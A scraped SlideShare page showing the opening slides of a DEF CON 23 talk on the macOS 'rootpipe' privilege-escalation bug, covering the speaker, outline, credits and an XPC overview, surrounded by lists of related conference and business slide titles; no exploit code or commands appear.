AWS Sydney Summit 2013 - Continuous Deployment Practices, with Production, Te...Amazon Web Services
 

Mais conteúdo relacionado

Mais procurados

Security and dev ops for high velocity organizations
Security and dev ops for high velocity organizationsSecurity and dev ops for high velocity organizations
Security and dev ops for high velocity organizationsChef
 
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpractices
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpracticesConf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpractices
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpracticesBrentMatlock
 
InSpec Workshop at Velocity London 2018
InSpec Workshop at Velocity London 2018InSpec Workshop at Velocity London 2018
InSpec Workshop at Velocity London 2018Mandi Walls
 
DevOpsDays InSpec Workshop
DevOpsDays InSpec WorkshopDevOpsDays InSpec Workshop
DevOpsDays InSpec WorkshopMandi Walls
 
BuildStuff.LT 2018 InSpec Workshop
BuildStuff.LT 2018 InSpec WorkshopBuildStuff.LT 2018 InSpec Workshop
BuildStuff.LT 2018 InSpec WorkshopMandi Walls
 
Razor, the Provisioning Toolbox - PuppetConf 2014
Razor, the Provisioning Toolbox - PuppetConf 2014Razor, the Provisioning Toolbox - PuppetConf 2014
Razor, the Provisioning Toolbox - PuppetConf 2014Puppet
 
Hardening Your Config Management - Security and Attack Vectors in Config Mana...
Hardening Your Config Management - Security and Attack Vectors in Config Mana...Hardening Your Config Management - Security and Attack Vectors in Config Mana...
Hardening Your Config Management - Security and Attack Vectors in Config Mana...Peter Souter
 
Nagios Conference 2012 - Eric Loyd - Nagios Implementation Case Eastman Kodak...
Nagios Conference 2012 - Eric Loyd - Nagios Implementation Case Eastman Kodak...Nagios Conference 2012 - Eric Loyd - Nagios Implementation Case Eastman Kodak...
Nagios Conference 2012 - Eric Loyd - Nagios Implementation Case Eastman Kodak...Nagios
 

Mais procurados (9)

Security and dev ops for high velocity organizations
Security and dev ops for high velocity organizationsSecurity and dev ops for high velocity organizations
Security and dev ops for high velocity organizations
 
Asterisk quick start Guide
Asterisk quick start Guide Asterisk quick start Guide
Asterisk quick start Guide
 
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpractices
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpracticesConf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpractices
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpractices
 
InSpec Workshop at Velocity London 2018
InSpec Workshop at Velocity London 2018InSpec Workshop at Velocity London 2018
InSpec Workshop at Velocity London 2018
 
DevOpsDays InSpec Workshop
DevOpsDays InSpec WorkshopDevOpsDays InSpec Workshop
DevOpsDays InSpec Workshop
 
BuildStuff.LT 2018 InSpec Workshop
BuildStuff.LT 2018 InSpec WorkshopBuildStuff.LT 2018 InSpec Workshop
BuildStuff.LT 2018 InSpec Workshop
 
Razor, the Provisioning Toolbox - PuppetConf 2014
Razor, the Provisioning Toolbox - PuppetConf 2014Razor, the Provisioning Toolbox - PuppetConf 2014
Razor, the Provisioning Toolbox - PuppetConf 2014
 
Hardening Your Config Management - Security and Attack Vectors in Config Mana...
Hardening Your Config Management - Security and Attack Vectors in Config Mana...Hardening Your Config Management - Security and Attack Vectors in Config Mana...
Hardening Your Config Management - Security and Attack Vectors in Config Mana...
 
Nagios Conference 2012 - Eric Loyd - Nagios Implementation Case Eastman Kodak...
Nagios Conference 2012 - Eric Loyd - Nagios Implementation Case Eastman Kodak...Nagios Conference 2012 - Eric Loyd - Nagios Implementation Case Eastman Kodak...
Nagios Conference 2012 - Eric Loyd - Nagios Implementation Case Eastman Kodak...
 

Semelhante a DEFCON 23 - Patrick Wardle - stick that in your (root)pipe and smoke it

From ci to cd - LavaJug 2012
From ci to cd - LavaJug 2012From ci to cd - LavaJug 2012
From ci to cd - LavaJug 2012Henri Gomez
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisChong-Kuan Chen
 
CEP Integration for Apache Stratos 4.0.0
CEP Integration for Apache Stratos 4.0.0CEP Integration for Apache Stratos 4.0.0
CEP Integration for Apache Stratos 4.0.0Manula Thantriwatte
 
GeekAustin DevOps
GeekAustin DevOpsGeekAustin DevOps
GeekAustin DevOpsMatt Ray
 
T2 – Continuous integration on aws
T2 – Continuous integration on awsT2 – Continuous integration on aws
T2 – Continuous integration on awsAmazon Web Services
 
Lviv MD Day 2015 Олексій Озун "Introduction to the new Apple TV and TVos"
Lviv MD Day 2015 Олексій Озун "Introduction to the new Apple TV and TVos"Lviv MD Day 2015 Олексій Озун "Introduction to the new Apple TV and TVos"
Lviv MD Day 2015 Олексій Озун "Introduction to the new Apple TV and TVos"Lviv Startup Club
 
Salt conf 2014 - Using SaltStack in high availability environments
Salt conf 2014 - Using SaltStack in high availability environmentsSalt conf 2014 - Using SaltStack in high availability environments
Salt conf 2014 - Using SaltStack in high availability environmentsBenjamin Cane
 
ITSAC 2011 SCAP for Inter-networking Devices
ITSAC 2011 SCAP for Inter-networking DevicesITSAC 2011 SCAP for Inter-networking Devices
ITSAC 2011 SCAP for Inter-networking Devicesc3i
 
Docker and Maestro for fun, development and profit
Docker and Maestro for fun, development and profitDocker and Maestro for fun, development and profit
Docker and Maestro for fun, development and profitMaxime Petazzoni
 
ContainerCon 2015 - Be a Microservices Hero
ContainerCon 2015 - Be a Microservices HeroContainerCon 2015 - Be a Microservices Hero
ContainerCon 2015 - Be a Microservices HeroDragos Dascalita
 
Aws microservice keynote
Aws microservice keynoteAws microservice keynote
Aws microservice keynotenextbuild
 
Automation with Packer and TerraForm
Automation with Packer and TerraFormAutomation with Packer and TerraForm
Automation with Packer and TerraFormWesley Charles Blake
 
AWS Sydney Summit 2013 - Continuous Deployment Practices, with Production, Te...
AWS Sydney Summit 2013 - Continuous Deployment Practices, with Production, Te...AWS Sydney Summit 2013 - Continuous Deployment Practices, with Production, Te...
AWS Sydney Summit 2013 - Continuous Deployment Practices, with Production, Te...Amazon Web Services
 
How to overengineer a meme generator
How to overengineer a meme generatorHow to overengineer a meme generator
How to overengineer a meme generatorKrešimir Antolić
 
Need to-know patterns building microservices - java one
Need to-know patterns building microservices - java oneNeed to-know patterns building microservices - java one
Need to-know patterns building microservices - java oneVincent Kok
 
Oracle Drivers configuration for High Availability
Oracle Drivers configuration for High AvailabilityOracle Drivers configuration for High Availability
Oracle Drivers configuration for High AvailabilityLudovico Caldara
 
Splunk n-box-splunk conf-2017
Splunk n-box-splunk conf-2017Splunk n-box-splunk conf-2017
Splunk n-box-splunk conf-2017Mohamad Hassan
 
Java EE 7 (Lyon JUG & Alpes JUG - March 2014)
Java EE 7 (Lyon JUG & Alpes JUG - March 2014)Java EE 7 (Lyon JUG & Alpes JUG - March 2014)
Java EE 7 (Lyon JUG & Alpes JUG - March 2014)David Delabassee
 
From printed circuit boards to exploits
From printed circuit boards to exploitsFrom printed circuit boards to exploits
From printed circuit boards to exploitsvirtualabs
 
The Real World - Plugging the Enterprise Into It (nodejs)
The Real World - Plugging the Enterprise Into It (nodejs)The Real World - Plugging the Enterprise Into It (nodejs)
The Real World - Plugging the Enterprise Into It (nodejs)Aman Kohli
 

Semelhante a DEFCON 23 - Patrick Wardle - stick that in your (root)pipe and smoke it (20)

From ci to cd - LavaJug 2012
From ci to cd - LavaJug 2012From ci to cd - LavaJug 2012
From ci to cd - LavaJug 2012
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
 
CEP Integration for Apache Stratos 4.0.0
CEP Integration for Apache Stratos 4.0.0CEP Integration for Apache Stratos 4.0.0
CEP Integration for Apache Stratos 4.0.0
 
GeekAustin DevOps
GeekAustin DevOpsGeekAustin DevOps
GeekAustin DevOps
 
T2 – Continuous integration on aws
T2 – Continuous integration on awsT2 – Continuous integration on aws
T2 – Continuous integration on aws
 
Lviv MD Day 2015 Олексій Озун "Introduction to the new Apple TV and TVos"
Lviv MD Day 2015 Олексій Озун "Introduction to the new Apple TV and TVos"Lviv MD Day 2015 Олексій Озун "Introduction to the new Apple TV and TVos"
Lviv MD Day 2015 Олексій Озун "Introduction to the new Apple TV and TVos"
 
Salt conf 2014 - Using SaltStack in high availability environments
Salt conf 2014 - Using SaltStack in high availability environmentsSalt conf 2014 - Using SaltStack in high availability environments
Salt conf 2014 - Using SaltStack in high availability environments
 
ITSAC 2011 SCAP for Inter-networking Devices
ITSAC 2011 SCAP for Inter-networking DevicesITSAC 2011 SCAP for Inter-networking Devices
ITSAC 2011 SCAP for Inter-networking Devices
 
Docker and Maestro for fun, development and profit
Docker and Maestro for fun, development and profitDocker and Maestro for fun, development and profit
Docker and Maestro for fun, development and profit
 
ContainerCon 2015 - Be a Microservices Hero
ContainerCon 2015 - Be a Microservices HeroContainerCon 2015 - Be a Microservices Hero
ContainerCon 2015 - Be a Microservices Hero
 
Aws microservice keynote
Aws microservice keynoteAws microservice keynote
Aws microservice keynote
 
Automation with Packer and TerraForm
Automation with Packer and TerraFormAutomation with Packer and TerraForm
Automation with Packer and TerraForm
 
AWS Sydney Summit 2013 - Continuous Deployment Practices, with Production, Te...
AWS Sydney Summit 2013 - Continuous Deployment Practices, with Production, Te...AWS Sydney Summit 2013 - Continuous Deployment Practices, with Production, Te...
AWS Sydney Summit 2013 - Continuous Deployment Practices, with Production, Te...
 
How to overengineer a meme generator
How to overengineer a meme generatorHow to overengineer a meme generator
How to overengineer a meme generator
 
Need to-know patterns building microservices - java one
Need to-know patterns building microservices - java oneNeed to-know patterns building microservices - java one
Need to-know patterns building microservices - java one
 
Oracle Drivers configuration for High Availability
Oracle Drivers configuration for High AvailabilityOracle Drivers configuration for High Availability
Oracle Drivers configuration for High Availability
 
Splunk n-box-splunk conf-2017
Splunk n-box-splunk conf-2017Splunk n-box-splunk conf-2017
Splunk n-box-splunk conf-2017
 
Java EE 7 (Lyon JUG & Alpes JUG - March 2014)
Java EE 7 (Lyon JUG & Alpes JUG - March 2014)Java EE 7 (Lyon JUG & Alpes JUG - March 2014)
Java EE 7 (Lyon JUG & Alpes JUG - March 2014)
 
From printed circuit boards to exploits
From printed circuit boards to exploitsFrom printed circuit boards to exploits
From printed circuit boards to exploits
 
The Real World - Plugging the Enterprise Into It (nodejs)
The Real World - Plugging the Enterprise Into It (nodejs)The Real World - Plugging the Enterprise Into It (nodejs)
The Real World - Plugging the Enterprise Into It (nodejs)
 

Mais de Felipe Prado

DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directoryDEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directoryFelipe Prado
 
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...Felipe Prado
 
DEF CON 24 - Tamas Szakaly - help i got ants
DEF CON 24 - Tamas Szakaly - help i got antsDEF CON 24 - Tamas Szakaly - help i got ants
DEF CON 24 - Tamas Szakaly - help i got antsFelipe Prado
 
DEF CON 24 - Ladar Levison - compelled decryption
DEF CON 24 - Ladar Levison - compelled decryptionDEF CON 24 - Ladar Levison - compelled decryption
DEF CON 24 - Ladar Levison - compelled decryptionFelipe Prado
 
DEF CON 24 - Clarence Chio - machine duping 101
DEF CON 24 - Clarence Chio - machine duping 101DEF CON 24 - Clarence Chio - machine duping 101
DEF CON 24 - Clarence Chio - machine duping 101Felipe Prado
 
DEF CON 24 - Chris Rock - how to overthrow a government
DEF CON 24 - Chris Rock - how to overthrow a governmentDEF CON 24 - Chris Rock - how to overthrow a government
DEF CON 24 - Chris Rock - how to overthrow a governmentFelipe Prado
 
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardwareDEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardwareFelipe Prado
 
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...Felipe Prado
 
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustrationDEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustrationFelipe Prado
 
DEF CON 24 - Gorenc Sands - hacker machine interface
DEF CON 24 - Gorenc Sands - hacker machine interfaceDEF CON 24 - Gorenc Sands - hacker machine interface
DEF CON 24 - Gorenc Sands - hacker machine interfaceFelipe Prado
 
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionistDEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionistFelipe Prado
 
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locksDEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locksFelipe Prado
 
DEF CON 24 - Rich Mogull - pragmatic cloud security
DEF CON 24 - Rich Mogull - pragmatic cloud securityDEF CON 24 - Rich Mogull - pragmatic cloud security
DEF CON 24 - Rich Mogull - pragmatic cloud securityFelipe Prado
 
DEF CON 24 - Grant Bugher - Bypassing captive portals
DEF CON 24 - Grant Bugher - Bypassing captive portalsDEF CON 24 - Grant Bugher - Bypassing captive portals
DEF CON 24 - Grant Bugher - Bypassing captive portalsFelipe Prado
 
DEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitchDEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitchFelipe Prado
 
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...Felipe Prado
 
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucksDEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucksFelipe Prado
 
DEF CON 24 - Dinesh and Shetty - practical android application exploitation
DEF CON 24 - Dinesh and Shetty - practical android application exploitationDEF CON 24 - Dinesh and Shetty - practical android application exploitation
DEF CON 24 - Dinesh and Shetty - practical android application exploitationFelipe Prado
 
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vncDEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vncFelipe Prado
 
DEF CON 24 - Antonio Joseph - fuzzing android devices
DEF CON 24 - Antonio Joseph - fuzzing android devicesDEF CON 24 - Antonio Joseph - fuzzing android devices
DEF CON 24 - Antonio Joseph - fuzzing android devicesFelipe Prado
 

Mais de Felipe Prado (20)

DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directoryDEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
 
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
 
DEF CON 24 - Tamas Szakaly - help i got ants
DEF CON 24 - Tamas Szakaly - help i got antsDEF CON 24 - Tamas Szakaly - help i got ants
DEF CON 24 - Tamas Szakaly - help i got ants
 
DEF CON 24 - Ladar Levison - compelled decryption
DEF CON 24 - Ladar Levison - compelled decryptionDEF CON 24 - Ladar Levison - compelled decryption
DEF CON 24 - Ladar Levison - compelled decryption
 
DEF CON 24 - Clarence Chio - machine duping 101
DEF CON 24 - Clarence Chio - machine duping 101DEF CON 24 - Clarence Chio - machine duping 101
DEF CON 24 - Clarence Chio - machine duping 101
 
DEF CON 24 - Chris Rock - how to overthrow a government
DEF CON 24 - Chris Rock - how to overthrow a governmentDEF CON 24 - Chris Rock - how to overthrow a government
DEF CON 24 - Chris Rock - how to overthrow a government
 
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardwareDEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
 
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
 
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustrationDEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
 
DEF CON 24 - Gorenc Sands - hacker machine interface
DEF CON 24 - Gorenc Sands - hacker machine interfaceDEF CON 24 - Gorenc Sands - hacker machine interface
DEF CON 24 - Gorenc Sands - hacker machine interface
 
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionistDEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
 
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locksDEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
 
DEF CON 24 - Rich Mogull - pragmatic cloud security
DEF CON 24 - Rich Mogull - pragmatic cloud securityDEF CON 24 - Rich Mogull - pragmatic cloud security
DEF CON 24 - Rich Mogull - pragmatic cloud security
 
DEF CON 24 - Grant Bugher - Bypassing captive portals
DEF CON 24 - Grant Bugher - Bypassing captive portalsDEF CON 24 - Grant Bugher - Bypassing captive portals
DEF CON 24 - Grant Bugher - Bypassing captive portals
 
DEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitchDEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitch
 
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
 
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucksDEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
 
DEF CON 24 - Dinesh and Shetty - practical android application exploitation
DEF CON 24 - Dinesh and Shetty - practical android application exploitationDEF CON 24 - Dinesh and Shetty - practical android application exploitation
DEF CON 24 - Dinesh and Shetty - practical android application exploitation
 
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vncDEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
 
DEF CON 24 - Antonio Joseph - fuzzing android devices
DEF CON 24 - Antonio Joseph - fuzzing android devicesDEF CON 24 - Antonio Joseph - fuzzing android devices
DEF CON 24 - Antonio Joseph - fuzzing android devices
 

Último

Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityPrincipled Technologies
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 

Último (20)

Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 

DEFCON 23 - Patrick Wardle - stick that in your (root)pipe and smoke it

  • 1. @patrickwardle STICK THAT IN YOUR (ROOT)PIPE & SMOKE IT
  • 2. “sources a global contingent of vetted security experts worldwide and pays them on an incentivized basis to discover security vulnerabilities in our customers’ web apps, mobile apps, and infrastructure endpoints.” WHOIS @patrickwardle!! always looking for more experts!
  • 3. xpc, rootpipe, malware, patches & 0days :) AN OUTLINE overview of XPC the bug in malware patch bypasspatch(es)
  • 4. Credits hax0ring is rarely an individual effort Ian Beer Emil Kvarnhammar Pedro Vilaça uncovered rootpipe Jonathan1Levin "Mac OS X & iOS Internals" @emilkvarnhammar @osxreverser
  • 6. a simple IPC mechanism which can provide security & robustness XPC “There are two main reasons to use XPC: privilege separation and stability.” -apple.com sandboxed 'XPC services' [privilege separation]
